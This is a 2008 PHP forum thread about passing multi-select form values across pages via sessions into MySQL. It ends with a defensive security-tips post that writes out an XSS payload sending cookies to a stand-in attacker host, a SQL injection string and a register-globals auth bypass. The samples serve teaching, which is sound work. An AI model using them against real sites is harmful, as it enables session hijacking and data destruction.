5 Replies - 1140 Views - Last Post: 08 September 2008 - 03:45 AM Rate Topic: -----

#1 samf

  • D.I.C Head

Reputation: 0
  • Posts: 93
  • Joined: 11-August 08

Php/Mysql (maybe sessions too) problem

Posted 03 September 2008 - 06:40 AM

Hi,
I am creating an online form which should take information from one page using a multiple-select box, then display the selected fields in an order confirmation page. This part of the code works fine. Then I press the submit (complete order) button and the information should then get stored into the MySQL database as a string. So if I selected Jan, Feb and Apr it will be stored in MySQL like jan,feb,apr, all in the same field.

I think the main problem is that the information that is stored in the confirmation page is not being registered with the final order complete page.

Here is the code:

FirstPage:


Code:
		  <select name="ilm[]" size="7" multiple="multiple">
			<option value="January"> January </option>
			<option value="February"> February </option>
			<option value="April"> April </option>
			<option value="May-Buyers-Guide"> May Buyers Guide </option>
			<option value="July"> July </option>
			<option value="August"> August </option>
			<option value="October"> October </option>
		  </select></center>	</td>



Just a normal Multiple-select table.

Second page:


Code:

	 	 <?php
		$_SESSION['details'] =$_POST['ilm'];

		$info2=$_SESSION['details'];
		if ($info2){
//			$str=implode(",", $info2);
			$str='';
			foreach ($info2 as $t){
				$str.=$t.', ';
			}
			$str=trim ($str,', ');
			echo $str.'<br>';
		}
	 ?>	



This is the code I use to display the select information from the table as a string.

Third Page:

This is the code that I am using to try and put the string into mysql

Code:

// Escape the string before interpolating it into the query, and report a failed query instead of failing silently.
$sql = "INSERT INTO onlineform (ilmissue) VALUES ('" . mysql_real_escape_string(implode(",", $_SESSION['details'])) . "')";
mysql_query($sql) or die(mysql_error());




I have tried echoing the string and it does not display it, probably meaning there is something else wrong which I cannot find. It seems not to find the on the second page, therefore not inserting it into the MySQL database.

Any help will be appreciated.

Thanks

PS: I have got session_start() on all the pages at the very top. Also the code does not display the forms; that's because I would be sending you about 700 lines of code that is unnecessary.


Code:

<form name="form1" method="post" action="./onlineFormPage2.php">



All of the form headers look like this and are pointing to the correct PHP page.


Replies To: Php/Mysql (maybe sessions too) problem

#2 CTphpnwb

  • D.I.C Lover

Reputation: 2911
  • Posts: 10,083
  • Joined: 08-August 08

Re: Php/Mysql (maybe sessions too) problem

Posted 03 September 2008 - 09:32 AM

This works for me:
<?php
var_dump($_POST);                                      // show everything that was posted, for testing
$x = isset($_POST['ilm']) ? $_POST['ilm'] : array();   // empty array on the first load, before anything is posted
$z = count($x);
echo "<br>" . $z . "<br>";
echo "<br>" . (isset($x[0]) ? htmlspecialchars($x[0]) : '') . "<br>";
?>

<html>
<form action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>" method="post">
<p>Select one or more:
<select multiple size="4" name="ilm[]">
<option> January </option>
<option> February </option>
<option> April </option>
<option> May Buyers Guide </option>
<option> July </option>
<option> August </option>
<option> October </option>
</select>
<input type="submit" value="Send">
</p>
</form>
</html>



#3 samf

  • D.I.C Head

Reputation: 0
  • Posts: 93
  • Joined: 11-August 08

Re: Php/Mysql (maybe sessions too) problem

Posted 04 September 2008 - 01:53 AM

Thanks for the help. Would you please be able to explain what this code does, or specifically what bit of code does what? I like to know how everything works :)

Thanks

#4 CTphpnwb

  • D.I.C Lover

Reputation: 2911
  • Posts: 10,083
  • Joined: 08-August 08

Re: Php/Mysql (maybe sessions too) problem

Posted 04 September 2008 - 04:18 AM

I've inserted comments, but if you run the code, you'll see what it does. It's all self contained. There is no need for separate pages.
<?php
var_dump($_POST); // This echoes the value(s) for post so that you can see if anything has been posted. For testing purposes only.
$x = isset($_POST['ilm']) ? $_POST['ilm'] : array(); // Set $x to the value of the ilm array from the multiple selection below (empty before the first post).
$z = count($x); // Set $z to the number of items in the $x array.
echo "<br>" . $z . "<br>"; // Display the number of items in the $x array.
echo "<br>" . (isset($x[0]) ? htmlspecialchars($x[0]) : '') . "<br>"; // Display the first item in the $x array. Change 0 to 1, 2, etc. to see other items.
?>

<html><!-- start html -->
<form action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>" method="post"> <!-- form action is to post back to same page -->
<p>Select one or more:
<select multiple size="4" name="ilm[]"> <!-- show 4 items/scroll to rest of list -->
<option> January </option>
<option> February </option>
<option> April </option>
<option> May Buyers Guide </option>
<option> July </option>
<option> August </option>
<option> October </option>
</select>
<input type="submit" value="Send"> <!-- set input button 'send' -->
</p>
</form>
</html>



Note that php and html can be mixed on the same page. There is php in the form action html above to tell it to self post.

#5 samf

  • D.I.C Head

Reputation: 0
  • Posts: 93
  • Joined: 11-August 08

Re: Php/Mysql (maybe sessions too) problem

Posted 04 September 2008 - 04:51 AM

OK, I get it better now, thanks.

The thing is, the structure is (which I can't change):

Page1 Page2 Page3
Selections ---> Display selections ---> Selections confirmed and added to mysql.

I'm actually only changing a small section of an online form. The first two pages seem to work fine on mine, and on the second page I can view my selections, but it does not seem to want to be inserted into MySQL.

This post has been edited by samf: 04 September 2008 - 05:27 AM

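An added example of the page 1 -> page 2 -> page 3 flow described in this thread (it is not samf's or CTphpnwb's code): page 2 keeps only values that the page-1 select actually offers and stores them in the session, and page 3 inserts the joined string with a bound parameter. It assumes a PDO connection $pdo to the poster's database and uses the table and column names from the thread.

```php
<?php
// Added example, not code from the thread. Assumes $pdo is a PDO connection to the
// poster's MySQL database; the table and column names (onlineform, ilmissue) are from the thread.
// session_start() must run before any output on every page, otherwise the session cookie
// is never set and page 3 sees an empty $_SESSION['details'].
session_start();

// The options the page-1 <select> offers; anything else posted is dropped.
const ALLOWED_ISSUES = array('January', 'February', 'April', 'May-Buyers-Guide',
                             'July', 'August', 'October');

/** Page 2: keep only posted values that are in the allowed list, save them, return them. */
function confirm_selection(array $post) {
    $chosen = (isset($post['ilm']) && is_array($post['ilm'])) ? $post['ilm'] : array();
    $chosen = array_filter($chosen, 'is_string');           // ignore nested arrays or other junk
    $valid  = array_values(array_intersect($chosen, ALLOWED_ISSUES));
    $_SESSION['details'] = $valid;
    return $valid;
}

/** Page 3: store the confirmed selection as "January,February,April" in one field. */
function store_selection(PDO $pdo) {
    if (empty($_SESSION['details'])) {
        return false;                                       // nothing confirmed, or session not shared
    }
    // Bound parameter: the value is never interpolated into the SQL text.
    $stmt = $pdo->prepare('INSERT INTO onlineform (ilmissue) VALUES (:ilm)');
    $ok = $stmt->execute(array(':ilm' => implode(',', $_SESSION['details'])));
    unset($_SESSION['details']);                            // one confirmation, one insert
    return $ok;
}

// Page 2 (onlineFormPage2.php) would do:
//   $selected = confirm_selection($_POST);
//   echo htmlentities(implode(', ', $selected), ENT_QUOTES, 'UTF-8');
// Page 3 would do:
//   store_selection($pdo) or die('Nothing to store');
```

If page 3 returns false although page 2 displayed the selection, check that nothing (not even a blank line before <?php) is sent before session_start() on either page.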

#6 smith123

  • New D.I.C Head

Reputation: 0
  • Posts: 1
  • Joined: 08-September 08

Re: Php/Mysql (maybe sessions too) problem

Posted 08 September 2008 - 03:45 AM

PHP MySQL Web Development Security Tips - 14 tips you should know when developing with PHP and MySQL

I read about many of these points in books and tutorials, but I was rather lazy to think about many of them initially and learned some of these lessons the hard way. Fortunately I didn't lose any major data over security issues with PHP MySQL, but my suggestion to everyone who is new to PHP is to read these tips and apply them *before* you end up with a big mess. I also learnt this while working with a software development company.


1. Do not trust user input
If you are expecting an integer, call intval() (or use a cast); if you don't expect a username to have a dash (-) in it, check it with strstr() and tell the user that this username is not valid.

Here is an example:
PHP Code:
$post_id = intval($_GET['post_id']);
mysql_query("SELECT * FROM post WHERE id = $post_id");

Now $post_id will be an integer for sure.


2. Validate user input on the server side
If you are validating user input with Javascript, be sure to do it on the server side too, because for bypassing your Javascript validation a user just needs to turn their Javascript off.
Javascript validation is only good to reduce the server load.


3. Do not use user input directly in your SQL queries
Use mysql_real_escape_string() to escape the user input.
PHP.net recommends this function (well, a little different):
PHP Code:
function escape($values) {
    if (is_array($values)) {
        $values = array_map('escape', $values); // recurse into arrays (plain function, so no $this here)
    } else {
        /* Quote if not integer */
        if (!is_numeric($values) || $values[0] == '0') {
            $values = "'" . mysql_real_escape_string($values) . "'";
        }
    }
    return $values;
}

Then you can use it like this:
PHP Code:
$username = escape($_POST['username']);
mysql_query("SELECT * FROM user WHERE username = $username"); /* escape() also adds quotes to strings automatically */


4. In your SQL queries don't put integers in quotes
For example, suppose $id is supposed to be an integer:
PHP Code:
$id = "0; DELETE FROM users";
$id = mysql_real_escape_string($id); // 0; DELETE FROM users - mysql_real_escape_string doesn't escape ;
mysql_query("SELECT * FROM users WHERE id='$id'");

Note that using intval() would fix the problem here.


5. Always escape the output
This will prevent XSS (Cross Site Scripting) attacks. Imagine you receive and save some data from a user and you want to display this data on a web page later (maybe their bio or username), and the user puts this bit of code in the input field along with their bio:

Code:
<script>alert('');</script>

If you display the raw user input on a web page this will be very ugly; it can even be worse if a user inputs this code instead:
Code:
<script>document.location.replace('http://attacker/?c='+document.cookie);</script>
With this, an attacker can steal cookies from whoever visits that page (containing the bio etc.), and this includes session cookies with session IDs in them, so the attacker can hijack your users' sessions and appear to be logged in as other users.

When displaying user input on a page, use htmlentities($user_bio, ENT_QUOTES, 'UTF-8');


6. When uploading files, validate the file mime type
If you are expecting images, make sure the file you are receiving is an image, or it might be a PHP script that can run on your server and do whatever damage you can imagine.

One quick way is to check the file extension:
PHP Code:
$valid_extensions = array('jpg', 'gif', 'png'); // ...

$file_name = basename($_FILES['userfile']['name']);
$_file_name = explode('.', $file_name);
$ext = strtolower($_file_name[count($_file_name) - 1]); // compare case-insensitively so "JPG" is treated like "jpg"

if (!in_array($ext, $valid_extensions, true)) {
    /* This file is invalid */
}

Note that validating the extension is a very simple way, and not the best way, to validate file uploads, but it's effective,
simply because unless you have set your server to interpret .jpg files as PHP scripts you are fine.


7. If you are using 3rd party code libraries, be sure to keep them up to date
If you are using code libraries like Smarty or ADODB etc. be sure to always download the latest version.


8. Give your database users just enough permissions
If a database user is never going to drop tables, then when creating that user don't give it drop table permissions; normally just SELECT, UPDATE, DELETE, INSERT should be enough.


9. Do not allow hosts other than localhost to connect to your database
If you need to, add only that particular host or IP as necessary but never, ever let everyone connect to your database server.


10. Your library file extensions should be PHP
.inc files will be served to the browser just like text files (unless your server is set up to interpret them as PHP scripts), so users will be able to see your messy code (kidding) and possibly find exploits or see your passwords etc.
Use extensions like config.inc.php, or have a .htaccess file in your extension (templates, libs etc.) folders with this one line:
Code:
deny from all

11. Have register globals off or define your variables first
Register globals can be very dangerous, consider this bit of code:
PHP Code:
if( user_logged_in() ) {
$auth = true;
}

if( $auth ) {
/* Do some admin stuff */
}

Now, with register globals on, an attacker can view this page like this and bypass your authentication:
http://yourwebsite.c...dmin.php?auth=1

If you have register globals on and you can't turn it off for some reason, you can fix these issues by defining your variables first:
PHP Code:
$auth = false;
if( user_logged_in() ) {
$auth = true;
}

if( $auth ) {
/* Do some admin stuff */
}

Defining your variables first is a good programming practice that I suggest you follow anyway.



12. Keep PHP itself up to date
Just take a look at www.php.net, see the release announcements, and note how many security issues they fix in every release to understand why this is important.


13. Read security books
Always look for new books about PHP security to read; you can start by reading the 4th book in the PHP thread, which is one of the best books on PHP security, and the author is a member of the PHP team so he knows the internals very well.


14. Contribute to this list
Feel free to reply to this thread and add to this list, it will be helpful for everyone!

http://www.infysolutions.com
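An added example for tip 6 above (not part of smith123's post): an upload check that inspects the file's content as well as the extension, since the extension comes from the client-supplied filename. It assumes a form field named userfile, that PHP's fileinfo extension is enabled, and an upload directory /var/uploads outside the web root.

```php
<?php
// Added example, not code from the thread. Assumes the fileinfo extension is loaded
// and that uploads are stored outside the web root (here /var/uploads, an assumption).

// Allowed extensions and the MIME type the file's bytes must report for each.
const ALLOWED_IMAGE_TYPES = array(
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
);

/**
 * Return a safe storage name for the upload, or null if it must be rejected.
 * $file is one entry of $_FILES (keys: name, tmp_name, error, size).
 */
function validate_image_upload(array $file) {
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;                       // transfer failed, or the path is not an HTTP upload
    }
    // Only the final extension of the client filename counts, lower-cased.
    $ext = strtolower(pathinfo(basename($file['name']), PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGE_TYPES[$ext])) {
        return null;
    }
    // Content check: the magic bytes on disk must agree with the claimed extension.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime  = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);
    if ($mime !== ALLOWED_IMAGE_TYPES[$ext]) {
        return null;                       // e.g. a script that was merely renamed to .jpg
    }
    // getimagesize() parses the image header; failure means it is not a real image.
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }
    // Never reuse the client name: store under a random name with the vetted extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Usage with the form field from tip 6:
//   $name = validate_image_upload($_FILES['userfile']);
//   if ($name === null) { die('Invalid upload'); }
//   move_uploaded_file($_FILES['userfile']['tmp_name'], '/var/uploads/' . $name);
```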
